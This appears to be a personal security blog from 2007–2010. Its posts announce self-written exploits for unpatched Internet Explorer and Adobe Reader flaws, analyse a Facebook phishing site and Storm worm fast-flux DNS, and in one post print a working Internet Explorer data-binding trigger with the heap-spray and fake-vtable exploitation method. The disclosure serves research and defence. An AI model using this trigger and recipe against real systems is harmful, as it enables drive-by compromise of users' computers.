December 23, 2010 @ 8:49 PM - Yemjob ... Jobs in Yemen
It's been a long time since I wrote something but I have been involved in many things that kept me super busy. Anyway, I just want to let you know that a website called Yemjob has been recently launched. If you are from Yemen or you are seeking employment in Yemen then you will find Yemjob useful.
January 17, 2010 @ 8:57 AM - Aurora Exploit ... Python Style
If you have been watching the news recently, you might have heard about the "Aurora" exploit. The exploit was used to compromise systems at Google, Adobe, and other high-profile companies. It targets an unpatched vulnerability in Internet Explorer that allows an attacker to execute arbitrary code on the victim's computer.

As ususal, I wrote my version of the exploit and posted the code in the software section. The exploit is based on code I found in the wild but has been improved to enhance the exploit's reliability.
December 21, 2009 @ 11:12 PM - Unpatched Vulnerability in Adobe Reader and Acrobat
There is an unpatched vulnerability in the latest and earlier versions of Adobe Reader and Acrobat. I've added to the software section a program that generates a PDF file to exploit the vulnerability.
November 23, 2009 @ 12:32 AM - Adobe Reader Exploit
I've added to the software section an exploit I wrote in the past that targets a vulnerability in Adobe Reader via the web to execute arbitrary code. The code automatically generates a valid PDF file and embeds the JavaScript code that triggers and exploits the vulnerability in file. The code can be easily modified to target related vulnerabilities in Adobe Reader so you might find it useful.
October 16, 2009 @ 12:41 AM - Updates to the Software Section
I've added some of the exploits I wrote in the past to the software section on my site to make them easily accessible to anyone who is interested in them. I've also added new tools, which you might find useful.
July 21, 2009 @ 9:33 PM - Yet Another Unpatched Vulnerability and PoC Exploit
An unpatched vulnerability in an ActiveX control (Microsoft Office Web Components) used by Internet Explorer is being actively exploited. My version of the exploit can be found here. The exploit's payload spawns the calculator.
July 09, 2009 @ 11:45 PM - Unpatched Vulnerability in Microsoft DirectShow and PoC Exploit
An unpatched vulnerability in an ActiveX control (Microsoft MPEG2TuneRequest) used by Internet Explorer is being actively exploited. I've written my version of the exploit in Python based on code I found in the wild. You can find the code here. The exploit's payload spawns the calculator.
May 16, 2009 @ 7:30 PM - New Domain and Web Host
Finally, I got my own domain name and moved my website to a new host. I will be changing the content of the website and adding new stuff soon so stay tuned.
Dec. 15, 2008 @ 11:48 PM - Unpatched Vulnerability in Internet Explorer
A critical vulnerability in several versions of Internet Explorer is being actively exploited. The vulnerability has not been patched yet by Microsoft, which means that your computer can get compromised by simply visiting a web page (using Internet Explorer) that exploits the vulnerability. Here is some code that can be used to trigger the vulnerability:
<xml id="foo">
<data><entry><![CDATA[<image src="http://&#x0c0c;&#x0c0c;AAAAAAAAAAA">]]></entry></data>
</xml>
<span datasrc="#foo" datafld="entry" dataformatas="html">
<span datasrc="#foo" datafld="entry" dataformatas="html">
</span>
</span>
When the code above is rendered by Internet Explorer, the first four bytes after the protocol in the URL specified in the image element can be used to control an object pointer in the RunHTMLApplication function in mshtml.dll. These four bytes (0c0c0c0c) gets stored in the eax register as shown below (code is from Internet Explorer 8 Beta 2):
mshtml!RunHTMLApplication+0x52db:
6a795bbd 8b08            mov     ecx,dword ptr [eax]  ds:0023:0c0c0c0c=????????
Here is the code that follows:
68565bbf 57              push    edi
68565bc0 50              push    eax
68565bc1 ff91c4000000    call    dword ptr [ecx+0C4h]
As you can see, the pointer copied to the ecx register should be pointing to a vtable (virtual method table). In the last line in the code above, you can see that control is transferred to one of the methods in the vtable whose address is stored at ecx + 0xc4. The vulnerability can be exploited by constructing a fake vtable at 0x0c0c0c0c (e.g., using heap spraying), where each method in the fake vtable points to 0x0c0c0c0c. The shellcode can be stored after the data that serves as the fake vtable. When control is transferred to the address stored at ecx + 0xc4 (0x0c0c0c0c), the bytes starting at that address will serve as a nop slide that leads to the shellcode.
Dec. 01, 2008 @ 1:06 PM - Python Wrapper for VMware
I posted a Python wrapper called vmpy that can be used to control a virtual machine directly from Python. The wrapper can be found here.
Nov. 9, 2008 @ 12:06 AM - DLL Injection
I posted a tool called DLLInjector that can inject a DLL of your choosing into a running process. The tool can be found here.
Sep. 30, 2008 @ 11:03 PM - M.Sc. Thesis
Finally, I uploaded my Master's thesis. You can find it here.
Aug. 27, 2008 @ 1:32 PM - M.Sc. Degree ... Almost Done
It's been a very long time since I posted something but I've been super busy. Anyway, the cool news is that I defended my Masters thesis yesterday and I passed :)
Jan. 3, 2008 @ 12:00 PM - Facebook Phish
Links pointing to a phishing site: www.facebook.com.profile.php.id.371233.cn started to appear on Facebook. The index page of the phishing site looks exactly like the login page on Facebook which can trick users into giving out their Facebook account information. If you try to login on the fraudulent site, it will execute a script on the web server which will most probably send the account information you entered to the phisher. You will then be redirected to the real login page on Facebook. If you think you are a victim of this phish then I would suggest that you change your Facebook password before it's too late. Here is a screenshot of the fraudulent site:

Notice that the year is 2007 on the fraudulent site and on Facebook it's 2008. This might tell us that the phishing attack was planned or started in 2007. I only knew about it earlier today :(
Jan. 1, 2008 @ 1:03 AM - Happy New Year
Finally ... it's 2008 :)
Dec. 24, 2007 @ 9:02 PM - Storm and Fast Flux in action
A new variant of the Storm worm is using the following domain name: merrychristmasdude.com to infect unsuspecting users with malware. The link to the web page appears in spam messages sent out by the Storm gang using compromised machines. The message uses social engineering techniques to get you to click on the link. By simply clicking on the link and visiting the page, your system can get compromised as it will try to exploit vulnerabilities in the browser you are using or the installed browser plug-ins to download a malicious executable file to your machine and run it without your knowledge. If the exploitation fails then you might be tricked into manually downloading and running the malicious executable file from the page.

As you can see below, a technique known as fast flux is used to hide the real web server serving the web page. Every time you try to resolve the domain name, it will point to a different IP address of a compromised machine that acts as a reverse proxy serving the web page.
merrychristmasdude.com. 0  IN  A  24.210.99.xxx  (cpe-24-210-99-xxx.mi.res.rr.com)
merrychristmasdude.com. 0  IN  A  76.117.96.xxx  (c-76-117-96-xxx.hsd1.pa.comcast.net)
merrychristmasdude.com. 0  IN  A  76.93.91.xxx   (cpe-76-93-91-xxx.socal.res.rr.com)
merrychristmasdude.com. 0  IN  A  90.45.180.xxx  (ABayonne-256-1-125-xxx.w90-45.abo.wanadoo.fr)
merrychristmasdude.com. 0  IN  A  68.204.186.xxx (xxx.186.204.68.cfl.res.rr.com)
merrychristmasdude.com. 0  IN  A  67.165.111.xxx (c-67-165-111-xxx.hsd1.pa.comcast.net)
merrychristmasdude.com. 0  IN  A  86.76.88.xxx   (xxx.88.76-86.rev.gaoland.net)
merrychristmasdude.com. 0  IN  A  24.129.120.xxx (c-24-129-120-xxx.hsd1.fl.comcast.net)
merrychristmasdude.com. 0  IN  A  68.167.71.xxx  (h-68-167-71-xxx.nycmny83.dynamic.covad.net)
merrychristmasdude.com. 0  IN  A  75.64.251.xxx  (c-75-74-251-xxx.hsd1.fl.comcast.net)
merrychristmasdude.com. 0  IN  A  74.128.121.xxx (74-128-121-xxx.dhcp.insightbb.com)
merrychristmasdude.com. 0  IN  A  68.42.114.xxx  (c-68-42-114-xxx.hsd1.mi.comcast.net)
merrychristmasdude.com. 0  IN  A  64.126.33.xxx  (64-126-33-xxx.dyn.everestkc.net)
merrychristmasdude.com. 0  IN  A  91.89.7.xxx    (HSI-KBW-091-089-007-xxx.hsi2.kabelbw.de)
merrychristmasdude.com. 0  IN  A  75.35.228.xxx  (adsl-75-35-228-xxx.dsl.pltn13.sbcglobal.net)
merrychristmasdude.com. 0  IN  A  69.237.162.xxx (ppp-69-237-162-xxx.dsl.frsn02.pacbell.net)
merrychristmasdude.com. 0  IN  A  82.231.43.xxx  (id75-11-82-231-43-xxx.fbx.proxad.net)
...
Nov. 6, 2007 @ 1:07 PM - Social Phishing
Check out this very cool paper. It's about context aware phishing attacks. It shows how the information posted by people on social networking websites like MySpace, Facebook, etc. can be used to make phishing attacks far more effective.